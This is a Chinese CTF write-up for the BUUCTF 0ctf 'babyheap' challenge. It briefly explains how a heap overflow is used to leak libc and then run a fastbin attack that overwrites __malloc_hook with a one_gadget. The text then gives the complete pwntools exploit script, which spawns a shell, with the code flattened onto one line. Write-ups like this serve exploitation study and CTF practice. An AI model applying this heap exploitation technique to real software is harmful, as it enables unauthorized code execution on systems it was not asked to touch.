题目|BUUCTF 0ctf-babyheap 题目|学习

这道题分配内存空间是用calloc释放之后会清空分配的内容

文章图片

edit函数存在堆溢出我们由打赢函数指针数组存在satck地址随机,我们先想到的fastbin attack写onegadget但是要先有libc基址也是先是information
leak然后contorl pc我们就可以
先分配4个

add(0x10)#0 add(0x10)#1 add(0x80)#2 add(0x10)#3

【题目|BUUCTF 0ctf-babyheap】修改第二个chunk的size为0x30,然后包含了第三个chunk的fd和bk,伪造一个chunk到第三个chunk的数据内,然后释放释放第二个chunk,然后再次申请同样的chunk,之后释放第三个chunk得到libc地址打印第二个chunk即可得到libc地址,然后再次申请一个fastbin大小的chunk修改其fd，即可任意地址写入(注意要将堆块复原因为calloc)
exp:

#!/usr/bin/python2 #coding=utf-8 #name:doudou from pwn import * local=1 if local==1: p=process('../binary/0babyheap') elf=ELF('../binary/0babyheap') libc=elf.libc else: p=remote('node3.buuoj.cn',25561) elf=ELF('../binary/0babyheap') libc=elf.libconegadget=[0x45216,0x4526a,0xf02a4,0xf1147]def add(size): p.sendlineafter('Command: ','1') p.sendlineafter('Size: ',str(size))def edit(idx,size,content): p.sendlineafter('Command: ','2') p.sendlineafter('Index: ',str(idx)) p.sendlineafter('Size: ',str(size)) p.sendlineafter('Content: ',content)def delete(idx): p.sendlineafter('Command: ','3') p.sendlineafter('Index: ',str(idx))def show(idx): p.sendlineafter('Command: ','4') p.sendlineafter('Index: ',str(idx))def exp(): add(0x10) #0 add(0x10) #1 add(0x80) #2 add(0x10) #3 payload='\x00'*0x18+p64(0x41) edit(0,len(payload),payload) pd='\x00'*0x18+p64(0x71) edit(2,len(pd),pd) delete(1) add(0x30) #1 edit(1,0x20,'\x00'*0x18+p64(0x91))#calloc delete(2) #edit(1,0x20,'a'*0x20) show(1) libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-0x10-libc.sym['__malloc_hook'] log.success('libcbase: '+hex(libcbase)) malloc_hook=libcbase+libc.sym['__malloc_hook'] one_gadget=libcbase+onegadget[1] log.success('One_gadge: '+hex(one_gadget)) add(0x60)#3 delete(2) pd2='a'*0x18+p64(0x71)+p64(malloc_hook-0x23) edit(1,len(pd2),pd2) add(0x60) #3 add(0x60) #4 payload='a'*19+p64(one_gadget) edit(4,len(payload),payload) show(1) p.interactive()if __name__=="__main__": exp()